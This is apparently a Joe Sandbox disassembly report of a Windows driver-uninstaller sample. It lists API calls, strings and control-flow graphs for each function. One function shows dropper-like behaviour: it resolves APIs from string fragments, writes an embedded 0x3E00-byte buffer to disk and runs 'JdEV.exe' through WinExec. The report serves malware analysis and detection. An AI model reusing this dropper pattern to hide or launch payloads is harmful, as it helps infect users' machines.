                                                              • GetObjectW.GDI32(?,0000005C,?), ref: 004DEBAD
                                                              • CreateFontIndirectW.GDI32(?), ref: 004DEBB7
                                                              • CreateFontIndirectW.GDI32(?), ref: 004DEBDA
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • __EH_prolog3_GS.LIBCMT ref: 004DEC65
                                                              • GetVersionExW.KERNEL32(?,0000011C), ref: 004DEDBB
                                                              • KiUserCallbackDispatcher.NTDLL(00001000), ref: 004DEDC6
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 004DEE4B
                                                              • GetProcAddress.KERNEL32(?,DrawThemeTextEx), ref: 004DEE5E
                                                              • GetProcAddress.KERNEL32(?,BufferedPaintInit), ref: 004DEE71
                                                              • GetProcAddress.KERNEL32(?,BufferedPaintUnInit), ref: 004DEE84
                                                              • GetProcAddress.KERNEL32(?,BeginBufferedPaint), ref: 004DEE97
                                                              • GetProcAddress.KERNEL32(?,EndBufferedPaint), ref: 004DEEAA
                                                              • GetProcAddress.KERNEL32(00000000,DwmExtendFrameIntoClientArea), ref: 004DEEF3
                                                              • GetProcAddress.KERNEL32(?,DwmDefWindowProc), ref: 004DEF06
                                                              • GetProcAddress.KERNEL32(?,DwmIsCompositionEnabled), ref: 004DEF19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Object$Font$CreateDeleteIndirect$AddressProc$lstrcpy$EnumFamiliesH_prolog3H_prolog3_Stock$CallbackCapsCharsetDeviceDispatcherException@8InfoMetricsSystemTextThrowUserVersionWindow_memset
                                                              • String ID: BeginBufferedPaint$BufferedPaintInit$BufferedPaintUnInit$DrawThemeParentBackground$DrawThemeTextEx$DwmDefWindowProc$DwmExtendFrameIntoClientArea$DwmIsCompositionEnabled$EndBufferedPaint$UxTheme.dll$dwmapi.dll
                                                              • API String ID: 283818339-1174303547
                                                              • Opcode ID: eb22e357544f3ca0fdd028abd97c420673e77450c9c809f81625a44e5c5380f8
                                                              • Instruction ID: 06b06a0710c032e244cc608428b5c55c23e898d1334e232512d9c7d5a0e5b851
                                                              • Opcode Fuzzy Hash: eb22e357544f3ca0fdd028abd97c420673e77450c9c809f81625a44e5c5380f8
                                                              • Instruction Fuzzy Hash: CF3236B08007189ECB21AFB6C854BEAFBF8BF54304F00495FE56A9B251DB746540CF54

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 482 4d2540-4d2580 SetupDiGetClassDevsW 483 4d2a18-4d2a36 call 5cc787 482->483 484 4d2586-4d259b call 4daf34 482->484 489 4d259d-4d25a2 call 4d8c10 484->489 490 4d25a7-4d25ca SetupDiEnumDeviceInfo 484->490 489->490 493 4d2664-4d2685 SetupDiGetDeviceRegistryPropertyW 490->493 494 4d25d0-4d25da GetLastError 490->494 497 4d26e4 493->497 498 4d2687-4d2692 GetLastError 493->498 495 4d25e0-4d25e7 GetLastError 494->495 496 4d29f2 494->496 495->496 499 4d25ed-4d261f GetLastError call 4d6400 call 4d2e70 call 4d8330 495->499 502 4d29f3-4d2a0c SetupDiDestroyDeviceInfoList 496->502 500 4d26ea-4d26ef GetLastError 497->500 498->500 501 4d2694-4d2699 GetLastError 498->501 527 4d2638-4d2641 499->527 528 4d2621-4d2631 499->528 506 4d26f5-4d2701 500->506 507 4d29c2-4d29dd SetupDiEnumDeviceInfo 500->507 501->499 504 4d269f-4d26a4 501->504 502->483 505 4d2a0e-4d2a13 502->505 512 4d26ad-4d26bf LocalAlloc 504->512 513 4d26a6-4d26a7 LocalFree 504->513 505->483 506->507 508 4d2707 506->508 509 4d29e3 507->509 510 4d2662 507->510 514 4d2716-4d271e 508->514 518 4d29e8-4d29ed call 4d8c10 509->518 510->493 512->499 516 4d26c5-4d26e0 SetupDiGetDeviceRegistryPropertyW 512->516 513->512 514->507 517 4d2724-4d2729 514->517 516->498 520 4d26e2 516->520 521 4d2730-4d2739 517->521 518->496 520->500 521->521 524 4d273b-4d2751 call 4d8c60 521->524 524->518 534 4d2757-4d2766 524->534 530 4d2659-4d265d 527->530 531 4d2643-4d264c 527->531 528->527 539 4d2633 528->539 530->502 532 4d264e 531->532 533 4d2651-4d2654 call 4d8570 531->533 532->533 533->530 537 4d2768-4d2771 call 4d8b70 534->537 538 4d2774-4d2784 call 5cd2a1 534->538 537->538 538->518 544 4d278a-4d2796 538->544 539->527 545 4d2798-4d27a8 call 5ccfe9 544->545 546 4d27b3-4d27b7 544->546 545->546 554 4d27aa-4d27b1 545->554 548 4d27bd-4d27cd call 5ccfe9 546->548 549 4d299e-4d29a0 546->549 558 4d27cf-4d27d6 548->558 559 4d27d8-4d27dc 548->559 550 4d29a3-4d29ac 549->550 550->550 553 4d29ae-4d29bc 550->553 553->507 556 4d2710-4d2713 553->556 554->546 557 4d282a-4d2837 lstrlenW 554->557 556->514 560 4d2839-4d2847 call 5d2b20 557->560 561 4d286a 557->561 558->557 558->559 559->549 562 4d27e2-4d27f2 call 5ccfe9 559->562 560->561 569 4d2849-4d2868 WideCharToMultiByte 560->569 564 4d286c-4d289f call 4d6400 * 2 call 4d8330 561->564 571 4d27fd-4d2801 562->571 572 4d27f4-4d27fb 562->572 581 4d28b8-4d28c1 564->581 582 4d28a1-4d28b1 564->582 569->564 571->549 574 4d2807-4d2817 call 5ccfe9 571->574 572->557 572->571 574->549 579 4d281d-4d2824 574->579 579->549 579->557 583 4d28d9-4d28e9 lstrlenW 581->583 584 4d28c3-4d28cc 581->584 582->581 590 4d28b3 582->590 588 4d291c 583->588 589 4d28eb-4d28f9 call 5d2b20 583->589 586 4d28ce 584->586 587 4d28d1-4d28d4 call 4d8570 584->587 586->587 587->583 593 4d291e-4d2951 call 4d6400 * 2 call 4d8330 588->593 589->588 597 4d28fb-4d291a WideCharToMultiByte 589->597 590->581 602 4d296a-4d2973 593->602 603 4d2953-4d2963 593->603 597->593 604 4d298b-4d299b SetupDiCallClassInstaller 602->604 605 4d2975-4d297e 602->605 603->602 609 4d2965 603->609 604->549 607 4d2980 605->607 608 4d2983-4d2986 call 4d8570 605->608 607->608 608->604 609->602
                                                              APIs
                                                              • SetupDiGetClassDevsW.SETUPAPI(00000000,00000000,00000000,00000004), ref: 004D2572
                                                              • SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,0000001C), ref: 004D25C2
                                                              • GetLastError.KERNEL32 ref: 004D25D6
                                                              • GetLastError.KERNEL32 ref: 004D25E0
                                                              • GetLastError.KERNEL32 ref: 004D25ED
                                                              • SetupDiGetDeviceRegistryPropertyW.SETUPAPI(00000000,0000001C,00000001,00000000,00000000,00000000,?), ref: 004D2681
                                                              • GetLastError.KERNEL32 ref: 004D268D
                                                              • GetLastError.KERNEL32 ref: 004D2694
                                                              • LocalFree.KERNEL32(?), ref: 004D26A7
                                                              • LocalAlloc.KERNELBASE(00000040,?), ref: 004D26B4
                                                              • SetupDiGetDeviceRegistryPropertyW.SETUPAPI(?,0000001C,00000001,00000000,00000000,?,?), ref: 004D26DC
                                                              • GetLastError.KERNEL32 ref: 004D26EA
                                                              • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 004D29F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$Setup$Device$InfoLocalPropertyRegistry$AllocClassDestroyDevsEnumFreeList
                                                              • String ID: Remove $VID_0525$VID_1782$VID_18D1&PID_4EE7$enum device err :
                                                              • API String ID: 3295277273-2904152880
                                                              • Opcode ID: 5dd27bbf3add56bbce25bfd85f0f23f32086c0900f7f381aac5d3e225a33fdf9
                                                              • Instruction ID: a4e65049ccf5a2eab9cf80a4e0fff53482fba0b4d4344b4de1ad92b2a17ac72c
                                                              • Opcode Fuzzy Hash: 5dd27bbf3add56bbce25bfd85f0f23f32086c0900f7f381aac5d3e225a33fdf9
                                                              • Instruction Fuzzy Hash: 1CE10371A00201AFDB10DB64CDA5F7E77A5EFA4724F14465BE811EB390DAB8ED02CB64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 733 676044-676074 GetPEB 734 676077-67609a 733->734 735 67609d-6760a0 734->735 736 6760a6-6760bc 735->736 737 6761ee-67622b CreateFileA 735->737 738 676110-676116 736->738 739 6760be-6760c5 736->739 754 676265-676269 737->754 755 67622d-676230 737->755 741 676129-67612f 738->741 742 676118-67611f 738->742 739->738 743 6760c7-6760ce 739->743 745 676131-676138 741->745 746 676148-67614e 741->746 742->741 744 676121-676124 742->744 743->738 747 6760d0-6760d7 743->747 749 6761bb-6761c0 744->749 745->746 750 67613a-676141 745->750 751 676167-67616f 746->751 752 676150-676157 746->752 747->738 753 6760d9-6760dd 747->753 757 6761c2-6761c5 749->757 758 6761e0-6761e9 749->758 750->746 756 676143-676146 750->756 760 676171-676178 751->760 761 676188-67618e 751->761 752->751 759 676159-676160 752->759 753->738 762 6760df-6760e3 753->762 765 676232-676238 755->765 756->749 757->758 766 6761c7-6761ca 757->766 758->735 759->751 767 676162-676165 759->767 760->761 768 67617a-676181 760->768 763 6761a7-6761ad 761->763 764 676190-676197 761->764 762->749 769 6760e9-67610b 762->769 763->749 771 6761af-6761b6 763->771 764->763 770 676199-6761a0 764->770 772 676246-676252 WriteFile 765->772 773 67623a-676242 765->773 766->758 774 6761cc-6761cf 766->774 767->749 768->761 775 676183-676186 768->775 769->734 770->763 777 6761a2-6761a5 770->777 771->749 778 6761b8 771->778 780 676255-676262 CloseHandle WinExec 772->780 773->765 779 676244 773->779 774->758 781 6761d1-6761d4 774->781 775->749 777->749 778->749 779->780 780->754 781->758 782 6761d6-6761d9 781->782 782->758 783 6761db-6761de 782->783 783->737 783->758
                                                              APIs
                                                              • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00676223
                                                              • WriteFile.KERNELBASE(00000000,FFF58236,00003E00,?,00000000), ref: 00676252
                                                              • CloseHandle.KERNELBASE(00000000), ref: 00676256
                                                              • WinExec.KERNEL32(?,00000005), ref: 00676262
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateExecHandleWrite
                                                              • String ID: .dll$Clos$Crea$GetM$GetT$JdEV.exe$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                                                              • API String ID: 3741012433-349371505
                                                              • Opcode ID: 0d78d3566c40cb484947d4d33a09a86410937cd62f88d763635a65b8d9c49c74
                                                              • Instruction ID: abebfaf40155dee4037584fc8cb39b384b0c4be7ac4db507482e94279fd4479d
                                                              • Opcode Fuzzy Hash: 0d78d3566c40cb484947d4d33a09a86410937cd62f88d763635a65b8d9c49c74
                                                              • Instruction Fuzzy Hash: A7610B74D01615DBCF24CF98C888AEDB7B6BF44316F65C1AAE409A7702C7709E81CB95

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,00000000,00000000), ref: 004DB85E
                                                              • SetLastError.KERNEL32(0000007B,00000000,?,?,00000104,?,?,?,00000000,00000000), ref: 004DB86D
                                                                • Part of subcall function 004D8E6A: _malloc.LIBCMT ref: 004D8E88
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,00000000,00000000), ref: 004DB87A
                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 004DB888
                                                              • __wfullpath.LIBCMT ref: 004DB8D4
                                                              • __wsplitpath_s.LIBCMT ref: 004DB914
                                                              • __wmakepath_s.LIBCMT ref: 004DB933
                                                                • Part of subcall function 004DB3FE: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000104,?,004DB85B,?,?,?,?,?,00000000,00000000), ref: 004DB412
                                                                • Part of subcall function 004DB3FE: GetProcAddress.KERNEL32(00000000,FindFirstFileTransactedW), ref: 004DB422
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$AddressFileFindFirstHandleModuleProc__wfullpath__wmakepath_s__wsplitpath_s_malloclstrlen
                                                              • String ID: 8)b
                                                              • API String ID: 1521982810-851702437
                                                              • Opcode ID: ca7fc2a4c63549f3c8fe507aeb6e496ae91c3e34c1cb50b4dc05ce8188199a51
                                                              • Instruction ID: 81db31126b4a9420da670e253c826e45320fc8f546ec1c17401371a4891a0b6f
                                                              • Opcode Fuzzy Hash: ca7fc2a4c63549f3c8fe507aeb6e496ae91c3e34c1cb50b4dc05ce8188199a51
                                                              • Instruction Fuzzy Hash: A341D571900204FBCB10BB628CA9EAF7BADEF59314F00056FF516D2392DB789940DBA4
                                                              APIs
                                                              • GetCommandLineW.KERNEL32(00000000,9E026D90), ref: 004D1057
                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,00000000), ref: 004D1060
                                                                • Part of subcall function 004DA2C5: SetErrorMode.KERNELBASE(00000000,?,?,004D106C,00000000), ref: 004DA2D3
                                                                • Part of subcall function 004DA2C5: SetErrorMode.KERNELBASE(00000000,?,?,004D106C,00000000), ref: 004DA2DB
                                                              • _wprintf.LIBCMT ref: 004D1075
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104,00622A58,00000000), ref: 004D10D0
                                                              • GetLastError.KERNEL32 ref: 004D10DE
                                                              • _wcsnlen.LIBCMT ref: 004D11A9
                                                              • _memset.LIBCMT ref: 004D1245
                                                              • _wcsrchr.LIBCMT ref: 004D12E8
                                                              • lstrlenW.KERNEL32(?,?,00000001,?,?), ref: 004D13BF
                                                              • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,?,00000000,00000000,?,?), ref: 004D13ED
                                                              • lstrlenW.KERNEL32(?,0000000A,?,?,?,00000001,?,?), ref: 004D148F
                                                              • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,00000000,00000000,00000000,?,?,?,00000001,?,?), ref: 004D14BD
                                                              • SetupUninstallOEMInfW.SETUPAPI(?,00000001,00000000,0000000A,?,?,?,0000000A,?,?,?,00000001,?,?), ref: 004D153F
                                                              • lstrlenW.KERNEL32(00000000,0000000A,00000000,?,00000000,?,?,?,0000000A,?,?,?,00000001,?,?), ref: 004D15C4
                                                              • WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,?,?,00000000,00000000,?,00000000,?,?,?,0000000A), ref: 004D15F2
                                                              • DeleteFileW.KERNEL32(?,0000000A,?,?,?,00000000,?,00000000,?,?,?,0000000A,?,?,?,00000001), ref: 004D168A
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,0000000A,?,?,?,00000001), ref: 004D1693
                                                              • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004D1715
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D1757
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D1799
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D17DB
                                                                • Part of subcall function 004D1FF0: SetupOpenInfFileW.SETUPAPI(?,00000000,00000002,00000000), ref: 004D2089
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D181D
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D185F
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D18A1
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D18E3
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D1925
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D1967
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D19A9
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D19EB
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D1A2D
                                                              • DeleteFileW.KERNELBASE(?), ref: 004D1A6F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$ByteCharErrorMultiWidelstrlen$ModeSetup$CommandDirectoryHandleLastLineModuleOpenUninstallWindows_memset_wcsnlen_wcsrchr_wprintf
                                                              • String ID: *.*$.inf$Fatal Error: MFC initialization failed$GetWindowsDirectory error:$Remove $Uninstall $\inf$\rdavcom.sys$\sprd_acm.sys$\sprd_enum.sys$\sprd_rdavcom.sys$\sprd_wvcom.sys$\sprd_wvmdm.sys$\sprdbus.sys$\sprdmodem.sys$\sprdmux.sys$\sprdport.sys$\sprdvcom.sys$\sprdvcomIOT.sys$\sprdvmdm.sys$\system32\drivers$\usbcommsprdserial.sys$oem$vector<T> too long
                                                              • API String ID: 254025050-3392595036
                                                              • Opcode ID: e8a343ba00fdb4057e017a841646633d066c06106b5cb26daf8df5c1b425769b
                                                              • Instruction ID: 395de4598db7f3219fb97f2e22c7656a338d9d4c8a2f0f9f52a80a3ae4dcf046
                                                              • Opcode Fuzzy Hash: e8a343ba00fdb4057e017a841646633d066c06106b5cb26daf8df5c1b425769b
                                                              • Instruction Fuzzy Hash: 7572E270A00611AFD710DB68CCA5F6AB3B5BF99324F14829AE4199B3E1DB34ED41CF94

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 004DE148
                                                              • GetSysColor.USER32(00000016), ref: 004DE157
                                                              • GetSysColor.USER32(0000000F), ref: 004DE164
                                                              • GetSysColor.USER32(00000015), ref: 004DE177
                                                              • GetSysColor.USER32(0000000F), ref: 004DE17F
                                                              • GetDeviceCaps.GDI32(?,0000000C), ref: 004DE1A5
                                                              • GetSysColor.USER32(0000000F), ref: 004DE1B3
                                                              • GetSysColor.USER32(00000010), ref: 004DE1BD
                                                              • GetSysColor.USER32(00000015), ref: 004DE1C7
                                                              • GetSysColor.USER32(00000016), ref: 004DE1D1
                                                              • GetSysColor.USER32(00000014), ref: 004DE1DB
                                                              • GetSysColor.USER32(00000012), ref: 004DE1E5
                                                              • GetSysColor.USER32(00000011), ref: 004DE1EF
                                                              • GetSysColor.USER32(00000006), ref: 004DE1F6
                                                              • GetSysColor.USER32(0000000D), ref: 004DE1FD
                                                              • GetSysColor.USER32(0000000E), ref: 004DE204
                                                              • GetSysColor.USER32(00000005), ref: 004DE20B
                                                              • GetSysColor.USER32(00000008), ref: 004DE215
                                                              • GetSysColor.USER32(00000009), ref: 004DE21C
                                                              • GetSysColor.USER32(00000007), ref: 004DE223
                                                              • GetSysColor.USER32(00000002), ref: 004DE22A
                                                              • GetSysColor.USER32(00000003), ref: 004DE231
                                                              • GetSysColor.USER32(0000001B), ref: 004DE238
                                                              • GetSysColor.USER32(0000001C), ref: 004DE242
                                                              • GetSysColor.USER32(0000000A), ref: 004DE24C
                                                              • GetSysColor.USER32(0000000B), ref: 004DE256
                                                              • GetSysColor.USER32(00000013), ref: 004DE260
                                                              • GetSysColor.USER32(0000001A), ref: 004DE27A
                                                              • GetSysColorBrush.USER32(00000010), ref: 004DE295
                                                              • GetSysColorBrush.USER32(00000014), ref: 004DE2AC
                                                              • GetSysColorBrush.USER32(00000005), ref: 004DE2BE
                                                              • CreateSolidBrush.GDI32(?), ref: 004DE2E2
                                                              • CreateSolidBrush.GDI32(?), ref: 004DE2FE
                                                              • CreateSolidBrush.GDI32(?), ref: 004DE31A
                                                              • CreateSolidBrush.GDI32(?), ref: 004DE336
                                                              • CreateSolidBrush.GDI32(?), ref: 004DE352
                                                              • CreateSolidBrush.GDI32(?), ref: 004DE36E
                                                              • CreateSolidBrush.GDI32(?), ref: 004DE38A
                                                              • CreatePen.GDI32(00000000,00000001), ref: 004DE3B3
                                                              • CreatePen.GDI32(00000000,00000001), ref: 004DE3D6
                                                              • CreatePen.GDI32(00000000,00000001), ref: 004DE3F9
                                                              • CreateSolidBrush.GDI32(?), ref: 004DE47D
                                                              • CreatePatternBrush.GDI32(00000000), ref: 004DE4BE
                                                                • Part of subcall function 004E0636: DeleteObject.GDI32(00000000), ref: 004E0645
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
                                                              • String ID:
                                                              • API String ID: 3754413814-0
                                                              • Opcode ID: 3491b6201aec06d5d4d6505ec1c9729154e2df45d0926fcdbfa34855ed77d255
                                                              • Instruction ID: e0d0a18ae3a40e1f2608217ebc691910f367d7c87bec035571a0b376f4a42abd
                                                              • Opcode Fuzzy Hash: 3491b6201aec06d5d4d6505ec1c9729154e2df45d0926fcdbfa34855ed77d255
                                                              • Instruction Fuzzy Hash: C8B18E70900B85AED730FF72CC55BABBAE0AF80700F00492FE19796691DEB9A549DF54

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 611 547836-54784c call 5cea56 614 547947-54794c call 5ceb2e 611->614 615 547852-547865 611->615 617 5478d4 615->617 618 547867-547879 615->618 619 5478d6-5478de 617->619 621 547888-5478d2 618->621 622 54787b-547882 618->622 623 5478e0-5478e3 619->623 624 5478f3-547900 call 542dea 619->624 621->619 622->621 625 5478e5-5478ec 623->625 626 54794d-547953 623->626 632 547911-547930 call 4e0e38 * 2 624->632 633 547902-54790c call 543fea 624->633 628 5478ee call 547335 625->628 626->614 629 547955-547969 call 4e0e38 626->629 628->624 629->624 637 54796b-547971 629->637 646 547932-547937 call 543bc6 632->646 647 54793c-547941 632->647 633->632 639 547979-547982 637->639 641 547c08-547cdd call 4dacff call 5cea56 call 4dfcaf call 4daf34 call 4d86c0 call 4f78df call 5430a8 call 4f7912 639->641 642 547988-547998 639->642 701 547d13-547d15 641->701 702 547cdf-547cfd CreateCompatibleDC * 2 641->702 642->641 645 54799e-5479c8 call 545b3b 642->645 654 5479d9-5479e1 645->654 655 5479ca-5479d7 call 4e060a 645->655 646->647 647->614 657 5479e3-5479e9 654->657 658 5479f8-547a08 LoadImageW 654->658 655->654 662 547a0b-547a26 GetObjectW 655->662 657->658 661 5479eb-5479f1 657->661 658->662 661->658 664 5479f3 661->664 665 547a38-547a3d 662->665 666 547a28-547a33 call 542fcc 662->666 664->658 669 547a44-547a4a 665->669 670 547a3f-547a42 665->670 674 547bd3-547bfd call 547da3 DeleteObject call 4ddc8f 666->674 673 547a50-547a53 669->673 669->674 670->669 670->673 673->674 677 547a59-547a89 call 4dfcaf CreateCompatibleDC call 4e0308 GetObjectW 673->677 690 547973-547976 674->690 691 547c03 674->691 692 547bc7-547bce call 4e0389 677->692 693 547a8f-547a9c SelectObject 677->693 690->639 691->624 692->674 693->692 695 547aa2-547ac4 CreateCompatibleBitmap 693->695 698 547ac6-547ace SelectObject 695->698 699 547ad3-547afe call 4dfcaf CreateCompatibleDC call 4e0308 SelectObject 695->699 698->692 714 547b16-547b37 BitBlt 699->714 715 547b00-547b11 SelectObject DeleteObject 699->715 704 547d16-547da1 call 547836 call 5ceb2e 701->704 705 547d03 call 4dfc45 702->705 706 547cff-547d01 702->706 708 547d08-547d11 705->708 706->705 706->708 708->704 719 547b9c-547bb8 SelectObject * 2 DeleteObject 714->719 720 547b39-547b3f 714->720 718 547bbb-547bc2 call 4e0389 715->718 718->692 719->718 722 547b91-547b9a 720->722 723 547b41-547b58 GetPixel 720->723 722->719 722->720 724 547b6a-547b6c call 542e23 723->724 725 547b5a-547b60 723->725 729 547b71-547b74 724->729 725->724 726 547b62-547b68 call 542ea5 725->726 726->729 731 547b86-547b8f 729->731 732 547b76-547b80 SetPixel 729->732 731->722 731->723 732->731
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00547840
                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002000), ref: 00547A02
                                                              • GetObjectW.GDI32(00000082,00000018,?), ref: 00547A14
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00547A66
